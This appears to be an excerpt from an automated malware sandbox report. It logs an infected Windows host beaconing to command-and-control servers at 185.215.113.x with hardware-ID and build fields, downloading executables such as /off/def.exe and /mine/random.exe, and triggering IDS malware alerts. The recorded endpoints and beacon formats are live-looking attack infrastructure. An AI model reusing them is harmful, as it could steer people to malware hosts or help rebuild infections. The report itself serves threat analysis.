Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJDGCAEBFIIECAKFHIJHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 30 45 38 39 38 41 35 31 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 2d 2d 0d 0a Data Ascii: ------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="hwid"3D0E898A519D1524750037------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="build"tale------GIJDGCAEBFIIECAKFHIJ--
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIDGDAKFHIEHJKFHDHDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 48 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 30 45 38 39 38 41 35 31 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 48 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 48 44 48 44 2d 2d 0d 0a Data Ascii: ------BFIDGDAKFHIEHJKFHDHDContent-Disposition: form-data; name="hwid"3D0E898A519D1524750037------BFIDGDAKFHIEHJKFHDHDContent-Disposition: form-data; name="build"tale------BFIDGDAKFHIEHJKFHDHD--
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 34.149.100.209 34.149.100.209
Source: Joe Sandbox View IP Address: 185.215.113.16 185.215.113.16
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49760 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49993 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49997 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50006 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:50008 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50012 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:50012 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:50044 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:50094 -> 185.215.113.16:80
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WHERE place_id = (SELECT id FROM moz_places WHERE url_hash = hash(:urlRestartOnLastWindowClosed.#maybeRestartBrowser - Still waiting for all windows to be closed and restartTimer to expire. (not restarting)https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/[{incognito:null, tabId:null, types:["sub_frame"], urls:["*://trends.google.com/trends/embed*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/[{incognito:null, tabId:null, types:["sub_frame"], urls:["*://trends.google.com/trends/embed*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WHERE moz-extension://6edd4cbe-8a9f-4158-beca-90f5feba9c8c/data/ua_overrides.jshttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WHERE moz-extension://6edd4cbe-8a9f-4158-beca-90f5feba9c8c/data/ua_overrides.jshttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WHERE moz-extension://6edd4cbe-8a9f-4158-beca-90f5feba9c8c/data/ua_overrides.jshttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3260229875.0000019E4C068000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3260229875.0000019E4C0EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\browser\features\webcompat@mozilla.org.xpihttps://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozilla-20&sourceid=Mozilla-searchhttps://en.wikipedia.org/wiki/Special:Search?search=&sourceid=Mozilla-searchUpdateService:selectUpdate - the user requires elevation to install this update, but elevation is disabled for this version.https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdmatch the pattern /^\{[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\}$/ihttps://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=utf-8&mode=blended&tag=mozilla-20&sourceid=mozilla-searchC:\Program Files\Mozilla Firefox\browser\features\formautofill@mozilla.org.xpiWebExtEvent actions should include a property "source", the id of the webextension that should receive the event.C:\Program Files\Mozilla Firefox\browser\features\webcompat-reporter@mozilla.org.xpi>|[ equals www.youtube.com (Youtube)
